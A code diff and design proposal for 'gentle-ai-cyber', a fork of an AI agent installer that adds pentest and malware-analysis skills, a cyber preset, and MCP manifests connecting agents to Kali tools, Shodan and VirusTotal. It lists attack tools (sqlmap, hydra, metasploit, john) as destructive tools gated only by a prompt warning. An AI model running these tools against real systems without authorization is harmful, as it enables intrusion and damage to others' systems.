@@ -85,7 +85,36 @@ const (
 	SkillCognitiveDoc    SkillID = "cognitive-doc-design"
 	SkillCommentWriter   SkillID = "comment-writer"
 	SkillWorkUnitCommits SkillID = "work-unit-commits"
+
+	// Cybersecurity skills (v1)
+	SkillPentestOrchestrator     SkillID = "pentest-orchestrator"
+	SkillAIPentestingValidation  SkillID = "ai-pentesting-validation"
+	SkillExploitChainPatterns    SkillID = "exploit-chain-patterns"
+	SkillWAFDetectionBypass      SkillID = "waf-detection-bypass"
+	SkillDetectionEngineer       SkillID = "detection-engineer"
+	SkillSecurityPythonScripts   SkillID = "python-security"
+	SkillMalwareTriage           SkillID = "malware-triage"
+	SkillSpecializedFileAnalyzer SkillID = "specialized-file-analyzer"
+	SkillMalwareDynamicAnalysis  SkillID = "malware-dynamic-analysis"
+	SkillMalwareReportWriter     SkillID = "malware-report-writer"
 )
+
+// PermissionTier indicates the risk level of an MCP server's tools.
+// Read from manifest.json; not hardcoded in Go.
+type PermissionTier string
+
+const (
+	PermissionTierUnrestricted PermissionTier = "unrestricted" // read-only: shodan, virustotal, context7, engram
+	PermissionTierDestructive  PermissionTier = "destructive"  // kali-mcp tools, metasploit
+	PermissionTierRestricted   PermissionTier = "restricted"   // future: deletes, resets
+)
+
+// ToolPermission maps an MCP server to its permission tier and dangerous tools.
+type ToolPermission struct {
+	MCPServer string
+	Tools     []string
+	Tier      PermissionTier
+}
 
 type PersonaID string
 
@@ -138,6 +167,7 @@ const (
 	PresetEcosystemOnly PresetID = "ecosystem-only"
 	PresetMinimal       PresetID = "minimal"
 	PresetCustom        PresetID = "custom"
+	PresetCyber         PresetID = "cyber"
 )
 
 type SDDModeID string

--- a/internal/tui/screens/preset.go
+++ b/internal/tui/screens/preset.go
@@ -12,6 +12,7 @@ func PresetOptions() []model.PresetID {
 		model.PresetFullGentleman,
 		model.PresetEcosystemOnly,
 		model.PresetMinimal,
+		model.PresetCyber,
 		model.PresetCustom,
 	}
 }
@@ -20,6 +21,7 @@ var presetDescriptions = map[model.PresetID]string{
 	model.PresetFullGentleman: "Everything: memory, SDD, skills, docs, persona & security",
 	model.PresetEcosystemOnly: "Core tools only: memory, SDD, skills & docs (no persona/security)",
 	model.PresetMinimal:       "Just Engram persistent memory",
+	model.PresetCyber:         "Cybersecurity Edition: SOC/malware analysis, pentest orchestration, offensive security tools, and Prowler compliance integration. Destructive tools require manual confirmation.",
 	model.PresetCustom:        "Choose components and skills manually; keep existing persona/settings unmanaged",
 }
 

--- a/mcps/kali-mcp/manifest.json
+++ b/mcps/kali-mcp/manifest.json
@@ -1,0 +1,27 @@
+{
+  "name": "kali-mcp",
+  "type": "stdio",
+  "description": "Kali Linux security tools via MCP",
+  "config": {
+    "command": "kali-server-mcp",
+    "args": []
+  },
+  "permission_tier": "destructive",
+  "destructive_tools": [
+    "nmap_scan",
+    "sqlmap_scan",
+    "hydra_attack",
+    "metasploit_run",
+    "nikto_scan",
+    "dirb_scan",
+    "gobuster_scan",
+    "wpscan_analyze",
+    "john_crack",
+    "enum4linux_scan"
+  ],
+  "confirmation_required": true,
+  "env": {
+    "KALI_HOST": "<user-configured>",
+    "KALI_SSH_KEY": "<user-configured>"
+  }
+}

--- a/mcps/shodan-mcp/manifest.json
+++ b/mcps/shodan-mcp/manifest.json
@@ -1,0 +1,13 @@
+{
+  "name": "shodan-mcp",
+  "type": "npx",
+  "description": "Shodan internet-connected device search via MCP",
+  "config": {
+    "command": "npx",
+    "args": ["-y", "@modelcontextprotocol/server-shodan"]
+  },
+  "permission_tier": "unrestricted",
+  "env": {
+    "SHODAN_API_KEY": "<user-configured>"
+  }
+}

--- a/mcps/virustotal-mcp/manifest.json
+++ b/mcps/virustotal-mcp/manifest.json
@@ -1,0 +1,13 @@
+{
+  "name": "virustotal-mcp",
+  "type": "npx",
+  "description": "VirusTotal file and URL analysis via MCP",
+  "config": {
+    "command": "npx",
+    "args": ["-y", "@modelcontextprotocol/server-virustotal"]
+  },
+  "permission_tier": "unrestricted",
+  "env": {
+    "VIRUSTOTAL_API_KEY": "<user-configured>"
+  }
+}

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/design.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/design.md
@@ -1,0 +1,368 @@
+# Design: Gentle AI Cybersecurity Fork
+
+## Technical Approach
+
+The cybersecurity fork adds a **additive layer** on top of gentle-ai's existing installer: new SkillID constants, a cyber preset, security-specific skill files, three MCP server configs, destructive-tool soft gates, a SOC orchestrator agent definition, and validation tests. The design follows gentle-ai's established patterns exactly — flat `skills/{name}/SKILL.md` directories, `internal/components/mcp/{name}.go` overlay JSON files, `internal/catalog/skills.go` catalog entries, and `internal/components/skills/presets.go` preset resolution. No existing code paths are modified; all additions are parallel to the existing MVP infrastructure.
+
+References: `cyber-skills/spec.md` (skill catalog), `cyber-mcp/spec.md` (MCP manifests and injection), `cyber-permissions/spec.md` (soft gate model).
+
+---
+
+## Architecture Decisions
+
+### Decision: Flat skill directory layout (not hierarchical)
+
+**Choice**: Security skills live in flat `skills/{name}/SKILL.md` directories, matching gentle-ai's existing layout.
+**Alternatives considered**: Hierarchical grouping like `skills/red-team/pentest-orchestrator/SKILL.md` to visually separate categories.
+**Rationale**: gentle-ai's asset embedding (`internal/assets/skills/`) and the `Inject()` function both expect flat directories where the skill name equals the directory name. The skill catalog `Category` field handles logical grouping. Adding hierarchy would require changes to the embed directive, the walk logic in `inject.go`, and the frontmatter validation test — all for no functional benefit. The flat layout also keeps cross-references (e.g., `malware-triage` referencing `specialized-file-analyzer`) simpler since every skill is at the same path depth.
+
+### Decision: Separate `mvpcyberSkills` function (not extending `mvpSkills`)
+
+**Choice**: A new `MVPCyberSkills()` function in `internal/catalog/skills.go` returns only the 11 cyber skills. A `CyberSkillsForPreset()` helper composes them with `MVPSkills()` when the cyber preset is selected.
+**Alternatives considered**: Adding all 31 skills (20 MVP + 11 cyber) to the existing `mvpSkills` slice and gating with a feature flag.
+**Rationale**: The existing `MVPSkills()` function is called by `normalizeSkills()` in `validate.go` and the TUI skill picker. Both rely on `MVPSkills()` returning exactly the skills available for the selected preset. Merging cyber skills into `mvpSkills` would break the standard `full-gentleman` preset — it would suddenly include pentest skills. Keeping them separate means: (1) existing presets are unchanged, (2) `PresetCyber` composes MVP + cyber, (3) the TUI skill picker shows cyber skills only when the cyber preset is active, (4) validation test `TestMVPSkillsCoverAllPresetSkills` continues to pass unchanged.
+
+### Decision: Permission tier is manifest-driven, not hardcoded
+
+**Choice**: Each MCP manifest JSON (`mcps/{name}/manifest.json`) contains a `permission_tier` field. The Go runtime reads this at injection time to determine whether to inject the destructive-tool warning into the system prompt.
+**Alternatives considered**: Hardcoding `PermissionTier` in Go constants per MCP server name (e.g., a switch statement `case "kali-mcp": return PermissionTierDestructive`).
+**Rationale**: The cyber-permissions spec requirement 5 explicitly states: "The `permission_tier` field SHALL be the single source of truth; it MUST NOT be hardcoded in Go." This allows users to reclassify MCP servers without recompilation — changing the manifest file is sufficient. Hardcoding would be simpler code but would violate the spec and prevent runtime customization.
+
+### Decision: gentleman-soc is an agent definition file, not a new AgentID
+
+**Choice**: `gentleman-soc.md` is a markdown file stored in `agents/gentleman-soc.md` and installed alongside system prompts as an augmentation file. It does NOT add `AgentGentlemanSOC` to `internal/catalog/agents.go`.
+**Alternatives considered**: Adding a new `AgentGentlemanSOC` constant and adapter, treating it as a full agent with its own config paths.
+**Rationale**: gentleman-soc is an orchestration persona that works *through* existing agents (Claude Code, OpenCode, etc.), not a standalone agent. Making it an AgentID would require an adapter implementation, config paths, MCP strategy, system prompt strategy — all for something that is conceptually a skill-loading instruction set. The definition file approach follows the same pattern gentle-ai uses for system prompt augmentation (`StrategyMarkdownSections`). The SOC pipeline phases (Recon → Triage → Analysis → Report) are skill-loading recipes, not agent behaviors.
+
+### Decision: Soft gate via agent prompt (not runtime proxy)
+
+**Choice**: Destructive-tool warnings are injected into the agent's system prompt as a `<!-- gentle-ai-cyber:destructive-warning -->` section. No Go runtime intercepts, blocks, or proxies MCP calls.
+**Alternatives considered**: A Go-side MCP proxy that intercepts `tools/call` requests for destructive tools and requires interactive confirmation via the TUI.
+**Rationale**: v1 scope explicitly excludes a hard proxy. A proxy would require: (1) a local MCP gateway server between the agent and kali-mcp, (2) a TUI confirmation prompt that pauses the agent, (3) handling of timeouts and agent retries. This is a significant feature that deserves its own design cycle. The soft gate approach: LLMs reliably follow instructions in their system prompt (especially Claude, GPT-4, and similar models), the warning is visible in the system prompt for user auditing, and the spec explicitly requires this approach.
+
+### Decision: Prowler MCP as external detection (not bundled)
+
+**Choice**: The installer runs `exec.LookPath("prowler-mcp")` at MCP configuration time. If found, it offers to configure it. If not found, it shows an installation hint and continues.
+**Alternatives considered**: Bundling `prowler-mcp` as a Python wheel inside the Go binary, embedding its check metadata as static JSON.
+**Rationale**: Prowler's checks are a living dataset (1345+ checks) that update frequently. Bundling would add 2.7MB+ of stale data. Embedding would create a sync maintenance burden. External detection means: (1) always-current Prowler, (2) zero binary bloat, (3) Prowler team maintains their own MCP. This aligns with the proposal's v1 scope.
+
+---
+
+## Data Flow
+
+### User Request Through Agent → Skill → MCP → Result
+
+```
+┌──────────┐    ┌──────────────┐    ┌──────────────┐    ┌───────────┐
+│  User    │───→│ Agent System  │───→│ Skill Load   │───→│ Skill     │
+│ Request  │    │ Prompt+Warning│    │ (malware-    │    │ SKILL.md  │
+│          │    │              │    │  triage)      │    │ Execution │
+└──────────┘    └──────┬───────┘    └──────────────┘    └─────┬─────┘
+                       │                                       │
+                       │  ┌──────────────────────────┐        │
+                       │  │ Destructive-Tool Warning  │        │
+                       │  │ (soft gate: confirm before│        │
+                       │  │  calling kali-mcp tools)  │        │
+                       │  └──────────────────────────┘        │
+                       │                                       ▼
+                ┌──────┴───────┐    ┌──────────────┐    ┌───────────┐
+                │ MCP Client   │───→│ kali-mcp /   │───→│ Tool      │
+                │ (Agent side) │    │ shodan-mcp / │    │ Execution │
+                │              │    │ virustotal   │    │ (nmap,etc)│
+                └──────────────┘    └──────────────┘    └───────────┘
+```
+
+### gentleman-soc Orchestration Pipeline
+
+```
+gentleman-soc.md (583-line agent definition)
+    │
+    ├── Phase 0: Reconnaissance ──→ Load pentest-orchestrator skill
+    ├── Phase 1: Triage ──────────→ Load malware-triage skill
+    ├── Phase 2: Analysis ────────→ Load specialized-file-analyzer
+    │                                  └── malware-dynamic-analysis
+    ├── Phase 3: Detection ───────→ Load detection-engineer skill
+    └── Phase 4: Reporting ───────→ Load malware-report-writer skill
+```
+
+The gentleman-soc definition file tells the agent WHEN to load each skill based on the PICERL (Prepare → Identify → Control → Eradicate → Recover → Lessons) phase. It does not load all skills upfront — it uses the existing skill-loading mechanism referenced in the AGENTS.md `available_skills` block.
+
+### Permission Gate Data Flow
+
+```
+MCP Manifest (manifest.json)
+    │
+    │  permission_tier: "destructive"
+    │  destructive_tools: ["nmap_scan", "sqlmap_scan", ...]
+    │
+    ▼
+┌──────────────────┐     ┌───────────────────────────┐
+│ mcp.Injection    │────→│ Agent System Prompt        │
+│ reads manifest   │     │ <!-- gentle-ai-cyber:       │
+│ at inject time   │     │   destructive-warning --> │
+│                  │     │ "Before executing any tool  │
+│                  │     │  marked DESTRUCTIVE..."     │
+└──────────────────┘     └───────────────────────────┘
+```
+
+The manifest is the single source of truth. The Go code reads it once during installation, injects the appropriate warning into the system prompt, and then has no further runtime involvement.
+
+---
+
+## File Changes
+
+| File | Action | Description |
+|------|--------|-------------|
+| `internal/model/types.go` | Modify | Add 11 SkillID constants (`SkillPentestOrchestrator` through `SkillMalwareReportWriter`), `PresetCyber` constant, `PermissionTier` type with 3 constants, `ToolPermission` struct |
+| `internal/catalog/skills.go` | Modify | Add `cyberSkills` slice and `MVPCyberSkills()` function returning 11 entries |
+| `internal/catalog/cyber_skills_test.go` | Create | Validation tests: frontmatter parsing, category validity, destructive tool manifest checks |
+| `internal/components/skills/presets.go` | Modify | Add `cyberSkills` var, extend `SkillsForPreset()` with `PresetCyber` case, extend `AllSkillIDs()` |
+| `internal/tui/screens/preset.go` | Modify | Add `PresetCyber` to `PresetOptions()`, add description in `presetDescriptions` |
+| `internal/tui/screens/skill_picker.go` | Modify | Add `cyberSkillIDs` group and `cyberSkillLabels`, render "Security Skills" section |
+| `internal/components/mcp/kali_mcp.go` | Create | Overlay JSON per agent strategy for kali-mcp (follows `context7.go` pattern) |
+| `internal/components/mcp/shodan_mcp.go` | Create | Overlay JSON per agent strategy for shodan-mcp (npx-based, similar to context7) |
+| `internal/components/mcp/virustotal_mcp.go` | Create | Overlay JSON per agent strategy for virustotal-mcp (npx-based) |
+| `internal/components/mcp/inject.go` | Modify | Add `InjectCyber()` function and extend existing `Inject()` to handle cyber MCPs when preset is cyber |
+| `mcps/kali-mcp/manifest.json` | Create | kali-mcp manifest: name, type stdio, command, args, `permission_tier: destructive`, `destructive_tools` list |
+| `mcps/shodan-mcp/manifest.json` | Create | shodan-mcp manifest: name, type npx, `permission_tier: unrestricted` |
+| `mcps/virustotal-mcp/manifest.json` | Create | virustotal-mcp manifest: name, type npx, `permission_tier: unrestricted` |
+| `skills/pentest-orchestrator/SKILL.md` | Create | Red-team skill: pentest orchestration (from glitch-ai-toolkit, adapted to gentle-ai frontmatter) |
+| `skills/ai-pentesting-validation/SKILL.md` | Create | Red-team skill: anti-hallucination validation for pentest findings |
+| `skills/exploit-chain-patterns/SKILL.md` | Create | Red-team skill: vulnerability chaining methodology |
+| `skills/waf-detection-bypass/SKILL.md` | Create | Red-team skill: WAF detection and bypass techniques |
+| `skills/detection-engineer/SKILL.md` | Create | Blue-team skill: Sigma/Suricata rule creation from analysis |
+| `skills/malware-triage/SKILL.md` | Create | SOC skill: initial malware assessment and classification |
+| `skills/specialized-file-analyzer/SKILL.md` | Create | SOC skill: non-PE file analysis (.NET, Office, PDF, ELF) |
+| `skills/malware-dynamic-analysis/SKILL.md` | Create | SOC skill: sandbox execution and behavioral observation |
+| `skills/malware-report-writer/SKILL.md` | Create | SOC skill: professional malware analysis report authoring |
+| `agents/gentleman-soc.md` | Create | SOC orchestrator agent definition (PICERL pipeline, skill-loading instructions) |
+| `internal/assets/skills/_shared/SKILL.md` | Modify | Add security skill cross-reference documentation in shared skill content |
+| `internal/cli/validate.go` | Modify | Extend `normalizePreset()` to accept `PresetCyber`, extend `normalizeSkills()` to accept cyber skill IDs |
+| `internal/components/skills/inject.go` | Modify | No change needed — cyber skills use the same embed-based injection path; `assets.FS` already walks by skill name |
+| `docs/cyber-permissions.md` | Create | User-facing documentation of the soft gate model, destructive tool list, warning semantics |
+| `docs/cyber-setup.md` | Create | Kali Linux MCP setup guide, shodan/virustotal API key configuration, Prowler MCP installation |
+| `scripts/sync-glitch-skills.sh` | Create | Shell script to pull upstream skill content from glitch-ai-toolkit and reformat frontmatter |
+
+---
+
+## Interfaces / Contracts
+
+### New SkillID Constants (`internal/model/types.go`)
+
+```go
+// Cybersecurity skills (v1)
+SkillPentestOrchestrator    SkillID = "pentest-orchestrator"
+SkillAIPentestingValidation SkillID = "ai-pentesting-validation"
+SkillExploitChainPatterns   SkillID = "exploit-chain-patterns"
+SkillWAFDetectionBypass     SkillID = "waf-detection-bypass"
+SkillDetectionEngineer      SkillID = "detection-engineer"
+SkillSecurityPythonScripts  SkillID = "python-security" // reserved; src name TBD post-content review
+SkillMalwareTriage          SkillID = "malware-triage"
+SkillSpecializedFileAnalyzer SkillID = "specialized-file-analyzer"
+SkillMalwareDynamicAnalysis SkillID = "malware-dynamic-analysis"
+SkillMalwareReportWriter    SkillID = "malware-report-writer"
+```
+
+Note: 10 constant names are listed here. The 11th skill in the proposal, `prowler-sdk-check`, is deferred to v2 (per spec `cyber-skills/spec.md` requirement 4). The `python-security` skill may rename depending on content review; the SkillID constant matches the directory name.
+
+### Cyber Skill Catalog Entries (`internal/catalog/skills.go`)
+
+```go
+var cyberSkills = []Skill{
+    {ID: model.SkillPentestOrchestrator, Name: "pentest-orchestrator", Category: "red-team", Priority: "p0"},
+    {ID: model.SkillAIPentestingValidation, Name: "ai-pentesting-validation", Category: "red-team", Priority: "p0"},
+    {ID: model.SkillExploitChainPatterns, Name: "exploit-chain-patterns", Category: "red-team", Priority: "p0"},
+    {ID: model.SkillWAFDetectionBypass, Name: "waf-detection-bypass", Category: "red-team", Priority: "p0"},
+    {ID: model.SkillDetectionEngineer, Name: "detection-engineer", Category: "blue-team", Priority: "p0"},
+    {ID: model.SkillSecurityPythonScripts, Name: "python-security", Category: "blue-team", Priority: "p0"},
+    {ID: model.SkillMalwareTriage, Name: "malware-triage", Category: "soc", Priority: "p0"},
+    {ID: model.SkillSpecializedFileAnalyzer, Name: "specialized-file-analyzer", Category: "soc", Priority: "p0"},
+    {ID: model.SkillMalwareDynamicAnalysis, Name: "malware-dynamic-analysis", Category: "soc", Priority: "p0"},
+    {ID: model.SkillMalwareReportWriter, Name: "malware-report-writer", Category: "soc", Priority: "p0"},
+}
+
+func MVPCyberSkills() []Skill {
+    skills := make([]Skill, len(cyberSkills))
+    copy(skills, cyberSkills)
+    return skills
+}
+```
+
+### Permission Tier Types (`internal/model/types.go`)
+
+```go
+type PermissionTier string
+
+const (
+    PermissionTierUnrestricted PermissionTier = "unrestricted"
+    PermissionTierDestructive  PermissionTier = "destructive"
+    PermissionTierRestricted  PermissionTier = "restricted"
+)
+
+type ToolPermission struct {
+    MCPServer string
+    Tools     []string
+    Tier      PermissionTier
+}
+```
+
+### Cyber Preset (`internal/model/types.go`)
+
+```go
+PresetCyber PresetID = "cyber"
+```
+
+### MCP Manifest Contract (`mcps/{name}/manifest.json`)
+
+```json
+{
+  "name": "kali-mcp",
+  "type": "stdio",
+  "description": "Kali Linux security tools via MCP",
+  "config": {
+    "command": "kali-server-mcp",
+    "args": []
+  },
+  "permission_tier": "destructive",
+  "destructive_tools": [
+    "nmap_scan",
+    "sqlmap_scan",
+    "hydra_attack",
+    "metasploit_run",
+    "nikto_scan",
+    "dirb_scan",
+    "gobuster_scan",
+    "wpscan_analyze",
+    "john_crack",
+    "enum4linux_scan"
+  ],
+  "confirmation_required": true,
+  "env": {
+    "KALI_HOST": "<user-configured>",
+    "KALI_SSH_KEY": "<user-configured>"
+  }
+}
+```
+
+### Skill Frontmatter Contract (Cyber skills)
+
+```yaml
+---
+name: malware-triage
+description: "Systematic malware triage and initial assessment. Trigger: When you need to perform initial malware assessment, classify samples, or determine analysis priority."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+```
+
+Key rules from `internal/assets/skills_frontmatter_test.go`:
+- `description` must be a quoted scalar (not `>` or `|` block)
+- `description` must contain `Trigger:` substring (except `_shared`)
+- `description` must be ≤160 chars
+- `name` must match the parent directory basename
+- No `auto_invoke` or `tool_schemas` keys (blocked by allowed-keys test)
+
+### Preset Composition (`internal/components/skills/presets.go`)
+
+```go
+// cyberSkills are the 10 v1 cybersecurity skills.
+var cyberSkills = []model.SkillID{
+    model.SkillPentestOrchestrator,
+    model.SkillAIPentestingValidation,
+    model.SkillExploitChainPatterns,
+    model.SkillWAFDetectionBypass,
+    model.SkillDetectionEngineer,
+    model.SkillSecurityPythonScripts,
+    model.SkillMalwareTriage,
+    model.SkillSpecializedFileAnalyzer,
+    model.SkillMalwareDynamicAnalysis,
+    model.SkillMalwareReportWriter,
+}
+```
+
+With `SkillsForPreset()` gaining a new case:
+
+```go
+case model.PresetCyber:
+    all := make([]model.SkillID, 0, len(sddSkills)+len(foundationSkills)+len(cyberSkills))
+    all = append(all, sddSkills...)
+    all = append(all, foundationSkills...)
+    all = append(all, cyberSkills...)
+    return all
+```
+
+And `AllSkillIDs()` updated to include cyber skills.
+
+---
+
+## Testing Strategy
+
+| Layer | What to Test | Approach |
+|-------|-------------|----------|
+| Unit | SkillID constants compile and are unique | `go vet` + duplicate check test |
+| Unit | `MVPCyberSkills()` returns exactly 10 entries with valid categories | Test that each entry has Category in `{"red-team","blue-team","soc"}` and non-empty Name |
+| Unit | `SkillsForPreset(PresetCyber)` returns 30 skills (20 MVP + 10 cyber) | Verify SDD + foundation + cyber skill IDs are all present |
+| Unit | `normalizePreset("cyber")` returns `PresetCyber` | Extend existing `normalizePreset` test table |
+| Unit | `normalizeSkills()` accepts all 10 cyber skill IDs | Extend existing skill normalization test |
+| Unit | Cyber skill SKILL.md files parse with valid frontmatter | Reuse existing `TestSkillFrontmatterIsLintClean` — no changes needed since it walks embedded assets |
+| Unit | Cyber skill minimal content (>100 chars beyond frontmatter, has `## Validation` section) | New test in `cyber_skills_test.go` |
+| Unit | MCP manifest JSON validates: required fields, `permission_tier` is one of the 3 valid values, `destructive_tools` is non-empty when tier is `destructive` | New test, possibly in `internal/components/mcp/manifest_test.go` |
+| Unit | `PresetCyber` appears in `PresetOptions()` and has a description | New test in preset_test |
+| Unit | `InjectCyber()` correctly writes kali-mcp, shodan-mcp, virustotal-mcp overlays per agent strategy | New test with mock adapters |
+| Integration | Full cyber preset TUI flow: select preset → see skills → install succeeds | Extend existing TUI integration test pattern |
+| Integration | Prowler MCP detection: `exec.LookPath` mock returning found/not found | New test in `internal/components/mcp/prowler_detect_test.go` |
+| E2E | `go build ./cmd/gentle-ai` compiles with all new code | CI build check |
+| E2E | All existing `go test ./...` pass with no regressions | CI test check |
+
+### Priority Test Scenarios (BDD)
+
+These map to the spec requirements in `cyber-skills/spec.md`, `cyber-mcp/spec.md`, and `cyber-permissions/spec.md`:
+
+1. **All 10 cyber skills registered in catalog** — `MVPCyberSkills()` returns exactly 10 entries
+2. **Red-team skills have correct category** — 4 skills with `Category: "red-team"`
+3. **No SkillID collisions** — 10 new constants don't duplicate any of the 20 existing ones
+4. **Skill frontmatter is lint-clean** — Existing asset test covers this automatically
+5. **Kali-mcp manifest has `permission_tier: destructive`** — JSON parsing test
+6. **Shodan/virustotal manifests have `permission_tier: unrestricted`** — JSON parsing test
+7. **Destructive tools list is non-empty for kali-mcp** — Array length check
+8. **PresetCyber resolves skills correctly** — 10 cyber + 20 MVP = 30 total
+9. **Non-cyber presets are unchanged** — `MVPSkills()` still returns 20 entries
+10. **No auto_invoke or tool_schemas in cyber skill frontmatter** — New test
+
+---
+
+## Migration / Rollout
+
+No data migration required. The change is purely additive:
+
+1. **Build step**: `go build ./cmd/gentle-ai` compiles all new code along with existing code
+2. **Asset embedding**: New skill directories under `internal/assets/skills/` are picked up automatically by the `//go:embed all:skills` directive in `assets.go`
+3. **Backward compatibility**: Selecting any existing preset (`full-gentleman`, `ecosystem-only`, `minimal`, `custom`) produces the same behavior as before. The `PresetCyber` is opt-in.
+
+**Rollback plan** (from proposal): Delete the added files and revert the modified Go files. All additions are additive, with no breaking changes to existing data structures or function signatures.
+
+---
+
+## Risks & Mitigations
+
+| Risk | Likelihood | Impact | Mitigation |
+|------|-----------|--------|------------|
+| kali-mcp tools cause real damage on production systems | High if misused | Critical | Soft gate via agent prompt warnings (v1); hard proxy planned for v2; kali-mcp requires external Kali host (not local); destructive MCPs are opt-in (not pre-selected) |
+| Skill content drifts from glitch-ai-toolkit upstream | Medium | Medium | `scripts/sync-glitch-skills.sh` pulls upstream content; frontmatter is stable (name/description/license/metadata); CI validates frontmatter on every build |
+| Agent ignores destructive-tool confirmation prompt | Medium | High | Documented as soft gate; v2 adds hard proxy; warning is visible in system prompt for auditing; kali-mcp requires explicit user consent during installation |
+| Prowler MCP API changes break integration | Low | Low | Prowler MCP is external dependency (pip package); v1 only configures it if detected, doesn't embed it; breaking changes in Prowler are Prowler's responsibility |
+| gentle-ai upstream changes conflict with fork | Medium | Medium | Rebase strategy; cyber additions are in separate files (catalog additions, skill directories, MCP configs) minimizing conflict surface; 11 SkillIDs and 1 PresetID are additive constants |
+| 10 new skills bloat binary size | Low | Low | Skills are markdown files copied at install time from embedded assets (`internal/assets/skills/`), not compiled. Each SKILL.md is ~5-15KB. Total: ~100-150KB added to binary |
+| Frontmatter lint test catches non-compliant upstream skill content | High | High | The `skills_frontmatter_test.go` enforces `Trigger:` substring, ≤160 chars, quoted description. Sync script must validate content before embedding. Test failures block the build |
+
+---
+
+## Open Questions
+
+- [ ] Should `python-security` skill keep this name or be renamed to `secure-python` or `python-security-scripts`? The glitch-ai-toolkit source needs to be checked for what this skill actually covers.
+- [ ] The 11th skill from the proposal (`prowler-sdk-check`) is deferred to v2 per the spec. Should its SkillID constant be reserved as a comment in `types.go` to avoid future naming collisions?
+- [ ] Should kali-mcp overlay JSON include `KALI_HOST` and `KALI_SSH_KEY` as template env vars that the user fills in, or should the TUI collect these during installation?
+- [ ] The `agents/gentleman-soc.md` definition file references PICERL phases that load skills by name. Should the SOC agent definition also inject `gentle-ai-cyber:destructive-warning` as a standalone section, or should it reference the same warning block that the MCP injection produces? (Currently designed as a single source of truth from the manifest.)
+- [ ] Should the `mcps/` directory live at the repo root (alongside `skills/`) or inside `internal/assets/mcps/` for embedding? The current pattern has MCP overlays in Go source (`internal/components/mcp/`), not as embedded assets. Manifests are a new concept — they need a home.

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/proposal.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/proposal.md
@@ -1,0 +1,347 @@
+# Proposal: Gentle AI Cybersecurity Fork
+
+## Intent
+
+gentle-ai is a Go 1.25+ TUI installer that configures 13 AI agents with SDD workflows, persistent memory, skills, and MCP servers. It currently targets general-purpose software development. Security professionals (SOC analysts, pentesters, compliance engineers) need the same orchestration quality but with cybersecurity-focused skills, agents, MCP servers, and permission controls.
+
+**gentle-ai-cyber** is a fork that repurposes the installer to ship a cybersecurity edition: security skills (from glitch-ai-toolkit), destructive-tool permission gates, Prowler compliance MCP integration, and a SOC orchestrator agent — while retaining full compatibility with gentle-ai's core (Engram, SDD, persona system, skill infrastructure).
+
+The fork must remain maintainable: downstream from gentle-ai, not a parallel universe. Every feature that works in gentle-ai must work here too — plus security additions on top.
+
+## Scope
+
+### In Scope (v1)
+
+1. **Fork Identity** — Repo, branding, description, positioning
+2. **Security Skill Catalog** — 11 security skills from glitch-ai-toolkit, ported to gentle-ai's flat `skills/{name}/SKILL.md` format with frontmatter
+3. **Cyber Category in Go Catalog** — New `Category: "red-team" | "blue-team" | "soc" | "compliance"` taxonomy in `internal/catalog/skills.go`
+4. **3 Cyber MCP Servers** — kali-mcp, shodan-mcp, virustotal-mcp with `manifest.json` files adapted from glitch-ai-toolkit
+5. **Permission Model for Destructive Tools** — Opt-in confirmation gate for tools that execute attacks (nmap, sqlmap, hydra, metasploit)
+6. **Prowler MCP Integration** — External MCP reference (no bundling); installer checks for prowler-mcp availability and configures it if present
+7. **Skill Format Decision** — Standardize on gentle-ai's simple frontmatter format; Prowler's AgentSkills with `auto_invoke` tables are NOT adopted in v1
+8. **gentleman-soc Agent** — SOC orchestrator agent definition, integrated as an optional agent accessible from all 13 existing agents via skill loading
+9. **Cyber Preset** — New `PresetCyber` in the TUI alongside full-gentleman, ecosystem-only, and minimal
+10. **Installer Cyber Flag** — CLI flag `--cyber` that selects the cybersecurity edition, mapping to `PresetCyber`
+
+### Out of Scope (v2)
+
+- Prowler compliance metadata bundling (1345 check JSONs); v2 can include a sync command
+- Prowler AgentSkills format adoption (auto_invoke tables) — requires a skill runtime that doesn't exist yet in gentle-ai
+- Custom cybersecurity-specific agent IDs (beyond gentleman-soc which is a persona, not a new AgentID)
+- Debian/RPM package distribution
+- EULA or legal disclaimer flow for pentest tools (acknowledged in docs only)
+- Centralized logging/audit trail for destructive tool usage
+- Additional MCP servers beyond kali/shodan/virustotal (e.g., MikroTik, Proxmox — stay in glitch-ai-toolkit)
+- Ongoing sync automation with Prowler releases (documented manual process for v1)
+
+## Approach
+
+### 1. Fork Identity
+
+- **Repository**: `github.com/rortizs/gentle-ai-cyber` (or `gentle-ai-cyber` in the same org if preferred)
+- **Go module**: `github.com/rortizs/gentle-ai-cyber`
+- **Binary name**: `gentle-ai-cyber`
+- **Description**: "Cybersecurity edition of Gentle AI — AI agent configurator for SOC analysts, pentesters, and compliance engineers"
+- **Positioning**: gentle-ai is the upstream; gentle-ai-cyber imports from it via Go module replace directives or direct copy with attribution. The cyber fork adds security-specific layers without diverging the core.
+
+### 2. Skill Format
+
+**Recommendation: Use gentle-ai's simple frontmatter format universally.**
+
+gentle-ai uses:
+```yaml
+---
+name: skill-name
+description: "One-line trigger description"
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+```
+
+Prowler's AgentSkills standard adds `auto_invoke` tables and `tool_schemas` — these require a runtime that gentle-ai doesn't have. Porting them would mean building a skill runtime first (significant scope creep).
+
+**Hybrid approach**: v1 uses simple frontmatter. When gentle-ai gains a skill runtime (tracked as v2), we can add `auto_invoke` tables to Prowler-derived skills. Until then, skill trigger descriptions serve the same purpose declaratively.
+
+### 3. Catalog Expansion Plan
+
+**v1 Skills (11 security + all existing gentle-ai skills):**
+
+| Category | Skills | Priority |
+|----------|--------|----------|
+| `red-team` | pentest-orchestrator, ai-pentesting-validation, exploit-chain-patterns, waf-detection-bypass | p0 |
+| `blue-team` | detection-engineer, python-security | p0 |
+| `soc` | malware-triage, specialized-file-analyzer, malware-dynamic-analysis, malware-report-writer | p0 |
+| `compliance` | prowler-sdk-check | p1 (v2) |
+| `sdd` (existing) | 10 SDD skills | p0 (inherited) |
+| `workflow` (existing) | 7 workflow skills | p0 (inherited) |
+| `testing` (existing) | go-testing | p0 (inherited) |
+
+**v2 Skills (nice-to-have):**
+
+| Category | Skills | Priority |
+|----------|--------|----------|
+| `compliance` | prowler-compliance, prowler-mcp, prowler-attack-paths-query | p1 |
